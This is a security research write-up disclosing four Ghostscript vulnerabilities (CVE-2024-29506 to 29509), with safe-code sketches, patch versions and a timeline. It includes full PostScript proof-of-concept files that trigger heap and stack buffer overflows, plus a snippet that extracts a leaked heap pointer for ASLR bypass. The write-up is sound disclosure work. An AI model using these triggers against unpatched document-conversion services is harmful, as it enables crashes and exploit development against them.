Research Thomas Rinsma 10-31-2024

Ghostscript wrap-up: overflowing buffers

TL;DR

This is an overview of CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509: a set of memory-corruption-related vulnerabilities in Ghostscript ≤ 10.02.1. These are the remaining bugs from our research, which we did not end up using in an exploit. Some may be exploitable, but this depends on whether Ghostscript is compiled with hardening countermeasures.

These vulnerabilities impact web applications and other services offering document conversion and preview functionality, as these often use Ghostscript under the hood. We recommend verifying whether your solution (indirectly) makes use of Ghostscript and, if so, updating it to the latest version.

This is the final part of a three-part series on Ghostscript bugs.

Part one covers CVE-2024-29510, a sandbox escape leading to remote code execution (RCE).
Part two covers CVE-2024-29511, a partial sandbox escape leading to an arbitrary file read/write.

The research for the CVEs in this post was performed by @b0n0b0__, Giorgio and Thomas.

Introduction

In addition to PostScript files, Ghostscript can also read and interpret PDF files. To do this, it used to invoke a PDF interpreter written in PostScript, but recently (as of 9.56.1) the interpreter has been ported to C, separating it from the PostScript interpreter. This switch prevents issues like "ghost in the pdf", a trick allowing one to embed PostScript code inside a PDF, which would be executed by Ghostscript when rendering the PDF.

However, the new C-based interpreter also opens up a new attack surface. As it turns out, this is not just a potential problem with malicious PDF files: it is also (by design) possible to invoke the new PDF interpreter from within PostScript. In essence you can “smuggle” a PDF inside a PostScript file (we could call this pdf in the post). This gives a much more powerful basis to explore the PDF interpreter’s attack surface from, as potential exploits can use PostScript to perform runtime calculations, dynamically generate a payload or trigger the PDF interpreter multiple times.

See part one for an introduction to PostScript and to the -dSAFER sandbox inside which it is normally executed by Ghostscript.

The Ghostscript documentation details a set of operators for interfacing with the PDF interpreter, including the straightforward runpdf:


<file> runpdf -

    Called from the modified PostScript run operator (which copies stdin to a temp file if required). Checks for PDF collections, processes all requested pages.

As documented, it expects a <file> object. If we have a PDF file’s contents as a byte-string in PostScript, we have to write it to a file first. Luckily, as explored in part one, this can be done inside the -dSAFER sandbox by writing to /tmp/:


% Create a new file and write some data to it
/PdfOutFile (/tmp/hello.pdf) (w) file def
PdfOutFile (...<binary PDF data>...) writestring
PdfOutFile closefile

% Open it again, but now for reading
/PdfInFile (/tmp/hello.pdf) (r) file def

% Invoke the PDF interpreter on our newly made file
PdfInFile runpdf

To make this more platform-agnostic, we can use the special %ram% prefix instead of a path to a file in /tmp/. Similarly to %pipe%, it results in a pseudo-file which can be read from and written to. These “files” are kept in memory during a PostScript file’s execution, allowing for an easy way to refer to data as a file object, without actually writing to disk. Unlike %pipe%, this is not harmful by itself and hence allowed in the -dSAFER sandbox.

Now we can pass arbitrary PDF data to the interpreter from within PostScript, but it gets even better: we can also configure the PDF interpreter from within PostScript!

The PDF interpreter supports various flags and parameters to tweak its behavior. You’ll usually see these being passed via the command-line when the PDF interpreter is invoked directly. However, in case of runpdf, these parameters are taken from the current PostScript dictionary (think of these as global variables).

As we’ll see in this post, it turns out that validation of several of these parameters is flawed or nonexistent, maybe because they are considered more “trusted” as they’re usually command-line arguments. Vulnerabilities CVE-2024-29509, CVE-2024-29506 and CVE-2024-29507 are all examples of this: memory corruption bugs that can be triggered from PostScript by invoking the PDF interpreter.

CVE-2024-29509 - heap buffer overflow via PDFPassword

A PDF feature you might be familiar with is password protection, which allows a PDF creator to lock (parts of) the document behind a password. This involves both relatively weak protections (relying on the PDF viewer to block certain operations) and actual encryption of data. Several different schemes are defined for this in the PDF standard, determining the algorithm used under the hood.

When the Ghostscript PDF interpreter encounters an encrypted document, it will attempt to use the string parameter PDFPassword as a password to unlock the document. In case the document uses encryption variant R5, the function check_password_R5(...) is called:


static int check_password_R5(pdf_context *ctx, char *Password, int PasswordLen, int KeyLen)
{
    int code;

    if (PasswordLen != 0) {
        pdf_string *P = NULL, *P_UTF8 = NULL;

        code = check_user_password_R5(ctx, Password, PasswordLen, KeyLen);
        if (code >= 0)
            return 0;

        code = check_owner_password_R5(ctx, Password, PasswordLen, KeyLen);
        if (code >= 0)
            return 0;

        /* If the supplied Password fails as the user *and* owner password, maybe its in
         * the locale, not UTF-8, try converting to UTF-8
         */
        code = pdfi_object_alloc(ctx, PDF_STRING, strlen(ctx->encryption.Password), (pdf_obj **)&P);
        if (code < 0)
            return code;
        memcpy(P->data, Password, PasswordLen);
        pdfi_countup(P);
        code = locale_to_utf8(ctx, P, &P_UTF8);
        if (code < 0) {
            pdfi_countdown(P);
            return code;
        }
        code = check_user_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen);
        if (code >= 0) {
            pdfi_countdown(P);
            pdfi_countdown(P_UTF8);
            return code;
        }

        code = check_owner_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen);
        pdfi_countdown(P);
        pdfi_countdown(P_UTF8);
        if (code >= 0)
            return code;
    }
    code = check_user_password_R5(ctx, (char *)"", 0, KeyLen);
    if (code >= 0)
        return 0;

    return check_owner_password_R5(ctx, (char *)"", 0, KeyLen);
}

As explained by the comment, the supplied password is converted to UTF-8 for a second attempt in case it is not initially correct (due to encoding differences). Before the locale_to_utf8(...) invocation, the password is memcpy’d into a newly allocated buffer. This code contains a sneaky bug, however: the number of bytes allocated is strlen(ctx->encryption.Password), while the number of bytes copied is PasswordLen. The latter is the size of the PDFPassword PostScript string. Notably, PostScript strings differ from C-strings in that they can contain null-bytes (their size is stored separately). In contrast, strlen determines the string’s length by the position of the first null-byte it encounters. This results in a buffer that is potentially too small for the data that is copied into it, and hence a heap buffer overflow.

Let’s look at a concrete example (\000 encodes a null-byte in PostScript):


/PDFPassword (hello\000world) def

This is a PostScript string of length 11, but strlen will consider it to have a length of 5. So, this means the memcpy looks like this:


//     char[5]     "hello\000world"   11
memcpy(P->data,    Password,          PasswordLen);
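To make the mismatch concrete outside of Ghostscript, here is a minimal C sketch. The counted_string type and both helper functions are hypothetical names invented for illustration, not Ghostscript APIs, and the safe variant is just one way to keep the allocation and copy sizes in sync, not necessarily what the upstream fix does.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for a counted string such as a PostScript string:
 * the length is stored next to the bytes, so embedded NULs are allowed. */
typedef struct {
    const char *data;
    size_t      length;
} counted_string;

/* Number of bytes the vulnerable pattern would allocate: strlen() stops
 * at the first NUL byte, regardless of the real length.
 * Assumes data is NUL-terminated somewhere, as a C string literal is. */
static size_t alloc_size_vulnerable(const counted_string *s)
{
    return strlen(s->data);
}

/* Safe variant: allocate exactly as many bytes as will be copied.
 * Returns NULL on allocation failure; the caller frees the result. */
static char *copy_counted(const counted_string *s)
{
    assert(s != NULL && s->data != NULL);
    char *buf = malloc(s->length ? s->length : 1);
    if (buf == NULL)
        return NULL;
    memcpy(buf, s->data, s->length);
    return buf;
}
```

For the (hello\000world) example, alloc_size_vulnerable reports 5 while the stored length is 11, which is exactly the gap the memcpy writes into.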

Here’s a full PostScript example triggering this bug:


% Simple PDF with R5 encryption.
% This is not a very valid PDF but we only need to reach the decryption logic
/Payload (%PDF-1.7
1 0 obj << /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >>
/Filter /Standard /Length 256
/O <bdc7906c8e8074c880ac23065956c0db6a83d234a942d296364d065edf800b8e32a728ba6916718fbeb70e071a4a33ba>
/OE <7c88773da067c026cc58b5204106d54e320d509ab1d10ac3251f7a14e60d6970>
/P -1028 /Perms <1b6bd44c023964a469d801f598c8d5c4> /R 5 /StmF /StdCF /StrF /StdCF
/U <338dc89fb4a90d45cacf91298759e015a6fb0d3f132af0e6970a0079af12054554e7ab059c5392f9abce8a329b2b154b>
/UE <0d8b18de820855c5855de2560a81db57bb4674946bdf2b25eb6b901386492bd7> /V 5 >>
endobj xref 0 1 0000000000 65535 f 0000000009 00000 n trailer << /Encrypt 1 0 R >> startxref 0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Set the PDFPassword to a buffer whose length is larger than its strlen
/PDFPassword (hello\000BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB) def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit


$ ghostscript -dNODISPLAY 1.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
zsh: segmentation fault (core dumped)  ghostscript -dNODISPLAY 1.ps

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

CVE-2024-29506 - stack buffer overflow in pdfi_apply_filter()

This one is quite straightforward. The boolean PDFDEBUG parameter (controlling the value of ctx->args.pdfdebug) can be set to enable printing of verbose logging information during the PDF parsing process. The function pdfi_apply_filter contains an instance of this:


static int pdfi_apply_filter(pdf_context *ctx, pdf_dict *dict, pdf_name *n, pdf_dict *decode,
                             stream *source, stream **new_stream, bool inline_image)
{
    int code;

    if (ctx->args.pdfdebug)
    {
        char str[100];
        memcpy(str, (const char *)n->data, n->length);
        str[n->length] = '\0';
        dmprintf1(ctx->memory, "FILTER NAME:%s\n", str);
    }
    // ... <rest of function trimmed> ...
}

This is a classic stack buffer overflow: str holds only 100 bytes, so once n->length reaches 100 the terminating write to str[n->length] already lands past the end of the buffer, and for anything larger memcpy itself continues copying data onto other elements of the stack.
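For a debug message like this one, truncating the name is usually acceptable. The following is a minimal sketch of a bounded copy under that assumption; copy_name_truncated is a hypothetical helper, not a Ghostscript function, and we are not claiming this is how the upstream fix is implemented.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy at most dst_size - 1 bytes of a counted (not NUL-terminated) name
 * into dst and NUL-terminate it. Returns the number of bytes copied. */
static size_t copy_name_truncated(char *dst, size_t dst_size,
                                  const unsigned char *name, size_t name_len)
{
    assert(dst != NULL && name != NULL);
    if (dst_size == 0)
        return 0;   /* no room even for the terminator */

    /* Clamp the copy length so the terminator always fits. */
    size_t n = name_len < dst_size - 1 ? name_len : dst_size - 1;
    memcpy(dst, name, n);
    dst[n] = '\0';
    return n;
}
```

With a 100-byte destination, a 300-byte filter name is cut to 99 bytes plus the terminator, so neither the memcpy nor the terminating write can leave the buffer.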

In this case, the originating buffer n->data comes from the PDF itself. To trigger the bug we make a PDF containing a long filter name:


% Simple PDF with a long (>100) filter name
/Payload (%PDF-1.7
1 0 obj << /Pages << /Count 1 /Kids [ << /Contents 2 0 R /Type /Page >> ] /Type /Pages >> /Type /Catalog >> endobj
2 0 obj << /Length 1
/Filter /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>> stream a endstream
endobj xref trailer << /Root 1 0 R >> startxref 0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Enable PDFDEBUG
/PDFDEBUG true def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit


$ ghostscript -dNODISPLAY 2.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
... <trimmed verbose PDF output> ...
*** buffer overflow detected ***: terminated
zsh: IOT instruction (core dumped)  ghostscript -dNODISPLAY 2.ps

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

CVE-2024-29507 - stack buffer overflows via CIDFSubstPath and CIDFSubstFont

These are two more stack buffer overflows, both in the PDF interpreter’s font substitution logic (pdfi_open_CIDFont_substitute_file(...)). This logic allows you to configure a font that replaces certain fonts that may be used in the PDF. As part of this, the parameters CIDFSubstPath and CIDFSubstFont are temporarily copied into a stack buffer of a fixed size (4096 bytes). However, in both cases, their length is not checked before the memcpy, resulting in overflows when the parameters are larger than the buffer:


char fontfname[gp_file_name_sizeof]; // 4096

// ... <snip> ...

if (ctx->args.cidfsubstpath.data == NULL) {
    memcpy(fontfname, fsprefix, fsprefixlen);
}
else {
    memcpy(fontfname, ctx->args.cidfsubstpath.data, ctx->args.cidfsubstpath.size);
    fsprefixlen = ctx->args.cidfsubstpath.size;
}

if (ctx->args.cidfsubstfont.data == NULL) {
    // ... <snip> ...
}
else {
    memcpy(fontfname, ctx->args.cidfsubstfont.data, ctx->args.cidfsubstfont.size);
    defcidfallacklen = ctx->args.cidfsubstfont.size;
}
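When the buffer holds a file path, silently truncating is rarely what you want, so rejecting oversized input is the more natural choice. Here is a minimal sketch of that approach, assuming the path is built as a prefix followed by a font name; build_subst_path and PATH_BUF_SIZE are hypothetical names, and the actual upstream fix may look different.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define PATH_BUF_SIZE 4096  /* mirrors the 4096-byte buffer in the excerpt */

/* Build "prefix + name" in out (PATH_BUF_SIZE bytes), NUL-terminated.
 * Both inputs are counted byte strings. Returns 0 on success, or -1 if
 * the result (including the terminator) would not fit. */
static int build_subst_path(char out[PATH_BUF_SIZE],
                            const char *prefix, size_t prefix_len,
                            const char *name, size_t name_len)
{
    assert(out != NULL && prefix != NULL && name != NULL);

    /* Check each length separately so the sum cannot wrap around. */
    if (prefix_len >= PATH_BUF_SIZE || name_len >= PATH_BUF_SIZE - prefix_len)
        return -1;

    memcpy(out, prefix, prefix_len);
    memcpy(out + prefix_len, name, name_len);
    out[prefix_len + name_len] = '\0';
    return 0;
}
```

A 9999-byte prefix, like the CIDFSubstPath value used to trigger the bug, is rejected before any byte is copied.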

To trigger this bug, we construct a PDF that contains a font definition to make sure the substitution logic is invoked (specifically, /Subtype /Type0 to trigger the right code path), and we set CIDFSubstPath (or CIDFSubstFont) to a very long string:


% Simple PDF with a Type0 font
/Payload (%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages
    << /Type /Pages /Kids [
        << /Type /Page /MediaBox [0 0 10 10] /Resources
            << /ProcSet[/PDF/Text] /Font
                << /F1
                    <<
                        /Type /Font
                        /Subtype /Type0
                        /Encoding /Identity-H
                        /DescendantFonts [ << /Type /Font >> ]
                    >>
                >>
            >> /Contents 2 0 R
        >>] /Count 1
    >>
>> endobj
2 0 obj << /Length 1 >> stream
/F1 1 Tf endstream endobj
xref trailer << /Size 7 /Root 1 0 R >> startxref 0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Set the payload to a very long string.
% For brevity, we use `string` to produce a bunch of null bytes
/CIDFSubstPath 9999 string def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit


$ ghostscript -dNODISPLAY 3.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
Processing pages 1 through 1.
Page 1
*** buffer overflow detected ***: terminated
zsh: IOT instruction (core dumped)  ghostscript -dNODISPLAY 3.ps

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

CVE-2024-29508 - heap pointer leak in pdf_base_font_alloc()

Last but not least, a somewhat unrelated bug. This is not a buffer overflow, but a heap pointer leak. It also does not involve the PDF interpreter, but instead it relates to the PDF output logic (the pdfwrite device).

This vulnerability is not as much of a problem by itself as the others in this post, but it may be a useful primitive in a larger exploit. Being able to obtain the memory address of a known object on the heap will indirectly reveal the location of other objects on the heap (modulo some unpredictability). Hence, this is a partial ASLR bypass.

The function pdf_base_font_alloc used by the pdfwrite device prepares font information for inclusion in an output PDF file. In cases where a font has no given name, it will use a hexadecimal pointer representation (".F" PRI_INTPTR → ".F0x%p") for the constructed BaseFont object’s name:


if (pfname->size > 0) {
    font_name.data = pfname->chars;
    font_name.size = pfname->size;
    while (pdf_has_subset_prefix(font_name.data, font_name.size)) {
        /* Strip off an existing subset prefix. */
        font_name.data += SUBSET_PREFIX_SIZE;
        font_name.size -= SUBSET_PREFIX_SIZE;
    }
} else {
    gs_snprintf(fnbuf, sizeof(fnbuf), ".F" PRI_INTPTR, (intptr_t)copied);
    font_name.data = (byte *)fnbuf;
    font_name.size = strlen(fnbuf);
}

This results in, for example:


<</BaseFont/YZKFTQ+.F0x5618b147e378/FontDescriptor 8 0 R/ToUnicode 11 0 R/Type/Font ...

Note the sub-string 0x5618b147e378, which is the leaked pointer in this example.
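The underlying pattern is easy to reproduce in isolation. In the sketch below, name_from_pointer mimics the leaky approach using standard C formatting, while name_from_counter shows one possible alternative that still yields unique names without revealing an address. Both functions are hypothetical illustrations, and we are not claiming the counter approach is what the upstream fix uses.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Leaky pattern: the generated name embeds the object's address. */
static int name_from_pointer(char *buf, size_t size, const void *obj)
{
    assert(buf != NULL);
    return snprintf(buf, size, ".F0x%" PRIxPTR, (uintptr_t)obj);
}

/* Alternative: derive the name from a per-document counter instead.
 * The counter is incremented after each use, so names stay unique. */
static int name_from_counter(char *buf, size_t size, unsigned long *counter)
{
    assert(buf != NULL && counter != NULL);
    return snprintf(buf, size, ".F%lu", (*counter)++);
}
```

Anything written by name_from_pointer can be parsed back into the original address by whoever reads the output, which is what makes it a leak.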

Just like we did in part one, we can read back the output PDF file as it is being written, from within the same PostScript program. Extracting the pointer is then a matter of some string manipulation. For example, we can take everything after the first occurrence of .F0x until the first / that follows:


% Obtain the PDF file we've just written
/InFile (/tmp/outputpdf) (r) file def
/LeakedData InFile 4096 string readstring pop def
InFile closefile

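% `search` leaves "post match pre true" on the stack (true on top).
% First keep only the text after (.F0x), then only the text before the next (/).
/Pointer LeakedData (.F0x) search pop pop pop (/) search pop exch pop exch pop def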

% The variable `Pointer` now contains the leaked heap pointer
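The same extraction can be sketched in C for readers less familiar with PostScript's stack manipulation. The function below is a hypothetical helper, not part of any exploit or of Ghostscript. It scans a counted byte buffer (PDF data may contain null-bytes) for the .F0x marker and parses the hexadecimal digits that follow.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Find the first ".F0x" marker that is followed by at least one hex digit
 * and parse up to 16 digits after it. Returns 1 and stores the value on
 * success, or 0 if no such marker is found. */
static int extract_leaked_pointer(const unsigned char *data, size_t len,
                                  uint64_t *out)
{
    static const char marker[] = ".F0x";
    const size_t mlen = sizeof marker - 1;

    assert(data != NULL && out != NULL);
    for (size_t i = 0; i + mlen <= len; i++) {
        if (memcmp(data + i, marker, mlen) != 0)
            continue;

        uint64_t value = 0;
        size_t digits = 0;
        for (size_t j = i + mlen; j < len && digits < 16; j++, digits++) {
            unsigned char c = data[j];
            unsigned v;
            if (c >= '0' && c <= '9')      v = (unsigned)(c - '0');
            else if (c >= 'a' && c <= 'f') v = (unsigned)(c - 'a' + 10);
            else if (c >= 'A' && c <= 'F') v = (unsigned)(c - 'A' + 10);
            else break;   /* e.g. the '/' that ends the name */
            value = (value << 4) | v;
        }
        if (digits > 0) {
            *out = value;
            return 1;
        }
    }
    return 0;
}
```

Applied to the BaseFont example above, this yields the value 0x5618b147e378.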

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit. Several other (potential) pointer leaks were also patched in the same commit.

Mitigation

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development.

The best mitigation against these vulnerabilities is to update your installation of Ghostscript to v10.03.0. However, note that the issue described in part one (CVE-2024-29510) has a higher impact and is only fixed in v10.03.1. Hence, we recommend updating to the latest available version to be as safe as possible against all publicly known attacks.

Timeline

2024-01-24 – reported to Ghostscript issue tracker
2024-01-25 – issues acknowledged by developers
2024-03-07 – Ghostscript 10.03.0 released, mitigating these vulnerabilities
2024-03-24 – CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509 assigned by MITRE
